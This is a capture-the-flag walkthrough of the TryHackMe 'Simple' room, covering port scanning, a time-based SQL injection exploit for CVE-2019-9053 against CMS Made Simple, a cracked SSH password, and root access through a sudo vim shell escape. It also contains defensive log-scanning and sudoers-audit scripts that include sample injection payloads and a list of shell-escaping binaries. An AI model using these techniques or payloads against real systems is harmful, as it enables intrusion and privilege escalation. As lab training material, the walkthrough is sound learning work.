Try Hack Me - Simple

Beginner level CTF

This is a walkthrough of the "Simple" room on Try Hack Me. I won't be including the actual answers to the questions posed, but the details will all be in here somewhere if you need help.

1 & 2

How many services are running under port 1000?
What is running on the higher port?

Let's run nmap:

kali@kali:~$ sudo nmap -v -sV 10.10.148.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-18 00:14 UTC
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 00:14
Scanning 10.10.148.149 [4 ports]
Completed Ping Scan at 00:14, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:14
Completed Parallel DNS resolution of 1 host. at 00:14, 0.02s elapsed
Initiating SYN Stealth Scan at 00:14
Scanning 10.10.148.149 [1000 ports]
Discovered open port 21/tcp on 10.10.148.149
Discovered open port 80/tcp on 10.10.148.149
Discovered open port 2222/tcp on 10.10.148.149
Completed SYN Stealth Scan at 00:14, 21.83s elapsed (1000 total ports)
Initiating Service scan at 00:14
Scanning 3 services on 10.10.148.149
Completed Service scan at 00:14, 6.85s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.148.149.
Initiating NSE at 00:14
Completed NSE at 00:14, 1.20s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 2.28s elapsed
Nmap scan report for 10.10.148.149
Host is up (0.24s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.96 seconds
           Raw packets sent: 2011 (88.460KB) | Rcvd: 14 (600B)

3 & 4

What's the CVE you're using against the application?
To what kind of vulnerability is the application vulnerable?

Well, we don't even know what the "application" is yet. Let's see what we can find on HTTP for this target. Let's run gobuster to see what there is other than the default Apache page.

kali@kali:~$ gobuster dir --url 10.10.148.149 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.148.149
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/17 23:35:33 Starting gobuster
===============================================================
/simple (Status: 301)

After poking around a little bit at what appears to be a CMS, one thing that stands out is a "news module" that looks to be installed. The page also lets us know the version of the software is 2.2.8.

Googling for "cms made simple news cve 2.2.8" lets us know it is vulnerable to a "blind time-based SQL injection via the m1_idlist parameter", known as CVE-2019-9053.

Find a suitable exploit script for the CVE that uses a time-based SQLi to extract the salt, username, and password fields. I ended up needing to adjust the script a bit to account for variations in timing and then to deal with some Unicode encoding issues in my wordlists or something. I'm still learning Python. It gets the necessary information easily enough after that. I also adjusted the script to let me not start from scratch but instead input the salt and password I had found. That way, when the script errored out on Unicode stuff, I could more quickly adjust it and retry.

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: m
[+] Username found: mi
[+] Username found: mit
[+] Username found: mitc
[+] Username found: mitch
[+] Email found: admin@admin.comn
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
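From the defender's side, the extraction above shows up in the web server log as a burst of requests in which `m1_idlist` stops being a plain list of numeric ids. This is an added example (not code from the room or the exploit script) that flags such requests in Apache combined-format log lines; the log lines, client addresses and user agents are constructed for the example.

```python
"""Flag requests to the CMS Made Simple news module whose m1_idlist
parameter does not look like a comma-separated list of numeric ids.
Added example for this walkthrough; SAMPLE_LOG is constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
# A legitimate id list is digits separated by commas; anything else is suspect.
IDLIST_OK = re.compile(r'^\d+(,\d+)*$')
# Delay functions that only make sense in a blind, time-based probe.
TIME_FUNCS = re.compile(r'\b(sleep|benchmark|pg_sleep|waitfor)\b', re.I)

SAMPLE_LOG = """\
10.10.10.5 - - [18/Sep/2020:00:20:01 +0000] "GET /simple/index.php?m1_idlist=1,2,3 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.10.10.9 - - [18/Sep/2020:00:20:02 +0000] "GET /simple/index.php?m1_idlist=1)+and+sleep(5)--+ HTTP/1.1" 200 1843 "-" "python-requests/2.24"
10.10.10.9 - - [18/Sep/2020:00:20:08 +0000] "GET /simple/index.php?m1_idlist=1%29%20AND%20SLEEP%285%29%23 HTTP/1.1" 200 1843 "-" "python-requests/2.24"
10.10.10.5 - - [18/Sep/2020:00:20:09 +0000] "GET /simple/news/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.10.9 - - [18/Sep/2020:00:20:10 +0000] "GET /simple/index.php?m1_idlist=1,a HTTP/1.1" 200 1843 "-" "python-requests/2.24"
"""


def classify(line):
    """Return (client_ip, decoded m1_idlist, reason) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs percent-decodes and turns '+' into spaces for us.
    qs = parse_qs(urlsplit(m['path']).query, keep_blank_values=True)
    for value in qs.get('m1_idlist', []):
        if IDLIST_OK.match(value):
            continue
        reason = 'time-based function' if TIME_FUNCS.search(value) else 'non-numeric idlist'
        return m['ip'], value, reason
    return None


def scan(log_text):
    """Run classify over every line and return the findings in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == '__main__':
    for ip, value, reason in scan(SAMPLE_LOG):
        print(f'{ip}: {reason}: {value!r}')
```

Correlating the flagged lines by client address and time window, as the repeated `10.10.10.9` entries suggest, is what distinguishes a character-by-character extraction from a single malformed request.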

5

What's the password?

[+] Password cracked: ******

6

Where can you login with the details obtained?
SSH is available on port 2222, so that seems like the most likely answer.

7

What's the user flag?

$ ls -l   
total 4
-rw-rw-r-- 1 mitch mitch 19 aug 17  2019 user.txt
$ cat user.txt  
**** ***, **** **!

Checking the open FTP port:

kali@kali:~$ ftp 10.10.29.213
Connected to 10.10.29.213.
220 (vsFTPd 3.0.3)
Name (10.10.29.213:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -l
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -l
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.00 secs (93.9220 kB/s)
ftp> 221 Goodbye.
kali@kali:~$ cat ForMitch.txt 
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

I didn't really need this helpful tip at this point, but it might have pointed out what needs to be done if I had checked it earlier.

8

Is there any other user in the home directory? What's its name?
Easy enough to go up and list the directories under /home.

9

What can you leverage to spawn a privileged shell?

Scan for privilege escalation with linpeas

It finds that this user can run vim as root. You can find this out with sudo -l as well. From there it's the last step: enter command mode in vim and open a shell, and we're root.
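The sudo rule that makes this step possible is the kind of thing an administrator can catch before a pentester does. As an added example (not part of the room or of linpeas), this parses sudoers-style rules and reports commands that can hand an interactive shell to whoever runs them; the sudoers lines and the list of shell-escaping binaries are constructed for the example and are not exhaustive.

```python
"""Audit sudoers rules for commands that can spawn a shell once started,
such as the vim rule this room relies on. Added example; SAMPLE_SUDOERS
and SHELL_ESCAPES are constructed and illustrative, not exhaustive."""
import re

# Editors, pagers and interpreters commonly able to escape to a shell.
SHELL_ESCAPES = {'vim', 'vi', 'nano', 'less', 'more', 'man',
                 'find', 'awk', 'python', 'python3', 'perl'}

# user  host = (runas[:group])  [TAG:]... command[, command]
RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$')
TAG_RE = re.compile(r'^([A-Z]+):\s*')

SAMPLE_SUDOERS = """\
# constructed for this example
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
alice   ALL=(root) /usr/bin/systemctl restart apache2, /usr/bin/less /var/log/apache2/*
"""


def audit(text):
    """Return (who, runas, command, nopasswd) for each shell-escaping command."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(('#', 'Defaults')):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest, tags = m['rest'], set()
        # Peel leading TAG: prefixes such as NOPASSWD: or SETENV:.
        while (t := TAG_RE.match(rest)):
            tags.add(t.group(1))
            rest = rest[t.end():]
        for cmd in (c.strip() for c in rest.split(',')):
            binary = cmd.split()[0].rsplit('/', 1)[-1] if cmd else ''
            if binary in SHELL_ESCAPES:
                findings.append((m['who'], m['runas'], cmd, 'NOPASSWD' in tags))
    return findings


if __name__ == '__main__':
    for who, runas, cmd, nopasswd in audit(SAMPLE_SUDOERS):
        print(f'{who} -> {runas}: {cmd}' + (' (NOPASSWD)' if nopasswd else ''))
```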

10

What's the root flag?

$ sudo vim

root@Machine:~# cd /root
root@Machine:/root# cat root.txt 
**** ****. *** **** **!